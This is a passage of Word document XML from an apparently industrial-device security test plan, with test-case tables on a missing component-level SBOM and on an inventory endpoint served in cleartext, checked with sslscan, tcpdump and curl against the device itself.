                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve">SM-10 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6910B8C0" w14:textId="2148E9CC" w:rsidR="00254A92" w:rsidRPr="006D5B99"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254A92" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1791A658" w14:textId="49C92581" w:rsidR="00254A92" w:rsidRPr="006D5B99"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254A92" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F36E8CA" w14:textId="5A9525D4" w:rsidR="00254A92" w:rsidRPr="006D5B99"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F22C23" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>004-</w:t>
            </w:r>
            <w:r w:rsidR="00F22C23" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>02</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, demonstrate that no bill of materials of the third-party constituents exists, so their versions cannot be enumerated or vulnerability-correlated</w:t>
            </w:r>
            <w:r w:rsidR="00F22C23" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 7.8 met at product but not component granularity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43B76D9D" w14:textId="0D4862F8" w:rsidR="00254A92" w:rsidRPr="006D5B99"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F22C23" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>004-</w:t>
            </w:r>
            <w:r w:rsidR="00F22C23" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>; record against RQ-006 traceability. Do not re-derive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FC8C0C7" w14:textId="2D939B5D" w:rsidR="00254A92" w:rsidRPr="006D5B99"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F22C23" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>004-</w:t>
            </w:r>
            <w:r w:rsidR="00F22C23" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>02</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. Expected FAIL: no component-level SBOM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6ACF36A2" w14:textId="77777777" w:rsidR="00254A92" w:rsidRPr="006D5B99" w:rsidRDefault="00254A92" w:rsidP="00254A92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6FC68F" w14:textId="77777777" w:rsidR="00254A92" w:rsidRPr="006D5B99" w:rsidRDefault="00254A92" w:rsidP="00254A9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6D5B99"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6D5B99" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D4A615E" w14:textId="77777777" w:rsidR="00254A92" w:rsidRPr="006D5B99"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54A92" w:rsidRPr="006D5B99"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Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7618EC0B" w14:textId="0B7AEC5E" w:rsidR="00254A92" w:rsidRPr="006D5B99"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TC-RQ006-02</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="006D5B99"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HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE00A42" w14:textId="19421F6A" w:rsidR="00254A92" w:rsidRPr="006D5B99"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6D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>reuse TC-RQ004-02.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="006D5B99"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Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3211BEFC" w14:textId="1B83305B"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B8909C9" w14:textId="4017B22B" w:rsidR="00254A92" w:rsidRPr="006D5B99"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per TC-RQ004-02; record under RQ-006. Do not re-derive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="006D5B99"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26F38E8D" w:rsidR="00254A92" w:rsidRPr="006D5B99" w:rsidRDefault="003A1DBD" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78873EF0" w14:textId="78734640" w:rsidR="00254A92" w:rsidRPr="006D5B99"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As TC-RQ004-02</w:t>
            </w:r>
            <w:r w:rsidR="00040AEE" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> no component-level SBOM (SDL/CRA shortfall). Evidence: reuse TC-RQ004-02 artefacts. [PLACEHOLDER: Result]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24B5BDDD" w14:textId="77777777" w:rsidR="00254A92" w:rsidRPr="006D5B99" w:rsidRDefault="00254A92" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="070BCDB6" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE99941" w14:textId="7052ED4E" w:rsidR="002852C5" w:rsidRPr="006D5B99" w:rsidRDefault="000B2EDF" w:rsidP="000B2EDF">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003140F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ006-0</w:t>
      </w:r>
      <w:r w:rsidR="00EE1174" w:rsidRPr="003140F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="003140F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="002852C5" w:rsidRPr="003140F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Plaintext Inventory Exposure (</w:t>
      </w:r>
      <w:r w:rsidR="00475091" w:rsidRPr="003140F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:r w:rsidR="002852C5" w:rsidRPr="003140F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-in-Depth Observation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40908A5E" w14:textId="7BA959DE" w:rsidR="000B2EDF" w:rsidRPr="006D5B99" w:rsidRDefault="000B2EDF" w:rsidP="000B2ED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6D5B99"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6D5B99" w:rsidRDefault="000B2EDF" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E922293"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6D5B99"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6D5B99" w:rsidRDefault="000B2EDF" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50DFB014" w14:textId="439630C5"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RQ-006 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 4.1 (observation only) </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B2EDF" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="000B2EDF" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00BCF49F" w14:textId="2D179D5F" w:rsidR="000B2EDF" w:rsidRPr="006D5B99"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B2EDF" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="000B2EDF" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18E5FBFD" w14:textId="5F875519" w:rsidR="000B2EDF" w:rsidRPr="006D5B99"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0B2EDF" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="000B2EDF" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10FEBC45" w14:textId="3320DB3A" w:rsidR="000B2EDF" w:rsidRPr="006D5B99"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Confirm the inventory read is served without transport encryption. Recorded as a </w:t>
            </w:r>
            <w:r w:rsidR="00475091" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>defense</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-in-depth observation (EN 50742 FR4 target = none), not a conformance FAIL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B2EDF" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="000B2EDF" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F65161E"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Trigger an inventory read; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AA00318" w14:textId="77777777" w:rsidR="00475091"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passively observe; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="501A932B" w14:textId="140E7B61" w:rsidR="000B2EDF" w:rsidRPr="006D5B99"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cleartext and no encrypted transport option.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B2EDF" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="000B2EDF" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="252B6FEB" w14:textId="14C4C873" w:rsidR="000B2EDF" w:rsidRPr="006D5B99"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Observation only. Documented as </w:t>
            </w:r>
            <w:r w:rsidR="00475091" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>defense</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-in-depth; not scored.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2980FDF4" w14:textId="77777777" w:rsidR="000B2EDF" w:rsidRPr="006D5B99" w:rsidRDefault="000B2EDF" w:rsidP="000B2EDF">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="549B47F1" w14:textId="77777777" w:rsidR="000B2EDF" w:rsidRPr="006D5B99" w:rsidRDefault="000B2EDF" w:rsidP="000B2ED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6D5B99"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6D5B99" w:rsidRDefault="000B2EDF" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49D43449" w14:textId="77777777" w:rsidR="000B2EDF" w:rsidRPr="006D5B99"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0B2EDF" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="000B2EDF" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D8C525C" w14:textId="4C0820C1" w:rsidR="000B2EDF" w:rsidRPr="006D5B99"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TC-RQ006-03</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C3962" w:rsidRPr="006D5B99"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7C3962" w:rsidRPr="006D5B99" w:rsidRDefault="007C3962" w:rsidP="007C3962">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78572030" w14:textId="7517D4E0" w:rsidR="007C3962" w:rsidRPr="006D5B99" w:rsidRDefault="007C3962" w:rsidP="007C396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 Kali as its own client</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C3962" w:rsidRPr="006D5B99"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7C3962" w:rsidRPr="006D5B99" w:rsidRDefault="007C3962" w:rsidP="007C3962">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28CF4464" w14:textId="7803A0EA"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tcpdump/Wireshark, curl, sslscan (CM-005).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C3962" w:rsidRPr="006D5B99"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7C3962" w:rsidRPr="006D5B99" w:rsidRDefault="007C3962" w:rsidP="007C3962">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E412EBD"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export SRIO=192.168.0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65AADAB4"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sslscan --show-certificate $SRIO:80 | tee cm_rq006-03_sslscan.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6695279F"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In parallel:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="031DDEC0"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sudo tcpdump -i eth1 host $SRIO and port 80 -w cm_rq006-03_http.pcap &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BF71304"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curl -s http://$SRIO/deviceinfo/swrevision/getdata</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40A13AD3"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kill %1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="045A8E3E" w14:textId="77777777" w:rsidR="007C3962" w:rsidRPr="006D5B99" w:rsidRDefault="007C3962" w:rsidP="007C3962">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Open cm_rq006-03_http.pcap in Wireshark, right-click a packet &gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A08498A" w14:textId="210F8EFB" w:rsidR="007C3962" w:rsidRPr="006D5B99" w:rsidRDefault="007C3962" w:rsidP="007C396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Follow &gt; HTTP Stream, to show the plaintext content.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C3962" w:rsidRPr="006D5B99"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2FAD7E3" w:rsidR="007C3962" w:rsidRPr="006D5B99" w:rsidRDefault="007C3962" w:rsidP="007C3962">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
